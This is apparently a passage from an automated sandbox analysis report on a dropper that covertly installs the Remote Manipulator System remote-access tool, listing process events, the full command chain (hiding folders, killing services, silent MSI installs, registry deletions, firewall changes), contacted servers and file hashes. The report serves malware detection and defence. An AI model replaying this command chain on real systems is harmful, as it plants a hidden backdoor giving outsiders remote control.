Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2636 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe C:\Windows\SysWOW64\cmd.exe
PID 428 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 428 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 428 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 1480 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 1480 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 1480 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 1940 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 1220 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1220 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1220 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1220 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2196 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1220 wrote to memory of 3976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1220 wrote to memory of 3976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1220 wrote to memory of 3976 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3976 wrote to memory of 756 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3976 wrote to memory of 756 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3976 wrote to memory of 756 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1220 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1220 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1220 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1220 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 3112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 1336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1220 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 1292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1220 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1220 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe

"C:\Users\Admin\AppData\Local\Temp\a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123.cmd" "

C:\Users\Admin\AppData\Local\Temp\set.exe

set.exe -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 784E58FAB6D675CB6D9196658DB211F4

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe


C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp
US 8.8.8.8:53 oneocsp.microsoft.com udp
US 204.79.197.203:80 oneocsp.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\123.cmd

MD5 dada62ed88a4fb1239573b99fece59b2
SHA1 39880571a27c2688559a81fdb4121339a83b3762
SHA256 43a93ceb9df8b17b5980b8e9c499ae1fccf248a06ee817f1987835f5d91f5fb8
SHA512 fc51a3a00603620ca06430d21d188eb2608ab83fb26bf69822839fdb8eecf36e65dc8a4b0f57a811e9cfa0460a22ebed2a3362e0b65afd585fc299f1629a303f

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 62de8fab8e2091cbd5a8897029b2c7ea
SHA1 e06430d20351d237b1ac355bebaeb74349b4d0c1
SHA256 7221193595cdda66f1900993d967dd0445ef8231c203ce0cd3771059d9582f21
SHA512 b12da04da431aba7b577ab84e4b4a4436b31e9ba88c21f6982ac5ff26252c22208e538cf3db884338866702413b1aaa2716bcf5e230f63da40cad44b3f6495a7

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 8ff0fa4e0c195ca554b3ca7ec0694d3b
SHA1 cfd05fa4d401c3f1d314f48b6d10dc19bc07a475
SHA256 51b0346c5454a50189ab1e23ba7ca381f7acf5834365d6b244e80957cd70da3f
SHA512 2b98ec38c18f1f9d767349792c2f0e7e7316d9206ee43b5b8ef0d452709c190518998af5a45187caeb4c00962e75c4f4de338c731e8a7696f6ed06c9565bc484

C:\Users\Admin\AppData\Local\Temp\install.cmd

MD5 d43e1bbae9332de223d13840fcd21a76
SHA1 1eb9cc47186ba225988382f2e38bbb75dc138128
SHA256 5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e
SHA512 3da28389b074181d4a0f68f03bb1ee4b4e3ab6de6401b3c868d4dbd9edbb8abc861e54f07896a2d94324a6c12f9bd6faec9489533e32617b1ee8f89884c2a400

C:\Users\Admin\AppData\Local\Temp\rms5.2.1.msi

MD5 2abaf6748b3b3a8aad84f715ae3bd3c1
SHA1 c03d62077019f114c317e6e78b5c3b0e8893cd0e
SHA256 c6e22f166038f6f2d131ade1861ace4fd83f0ce9dc46f5b5f0332ef918ef0164
SHA512 b4f563c9e5d2aac42fb088851c1e00de4cbf8c9506e2d09f86eaedb9cd103ad19a0ed50e3e4c1dee892eb25a37f5b2221c8c609ddd83d2fb3f51c5891cfdeec2

C:\Windows\Installer\MSIAC54.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\Installer\MSIAC54.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/2756-404-0x0000000000870000-0x000000000091E000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\RWLN.dll

MD5 bb1f3e716d12734d1d2d9219a3979a62
SHA1 0ef66eed2f2ae45ec2d478902833b830334109cb
SHA256 d7e9c9043ed7df2af800d9b2a33e3efddf68b70f043e9717afc4b7dd4e13e077
SHA512 bbc90747dd45a01b05f5c0b6fa58ffe18af894b05363267ac1cc9fe3262f5e65c8ae4e08dfd82d89b9112e86e42d24a12784b79f5ea30b6443015c19b6792c9c

memory/3848-409-0x0000000000B20000-0x0000000000B21000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1252-416-0x0000000000870000-0x000000000091E000-memory.dmp

memory/380-417-0x0000000000BB0000-0x0000000000BD3000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/1148-424-0x00000000024A0000-0x00000000024A1000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
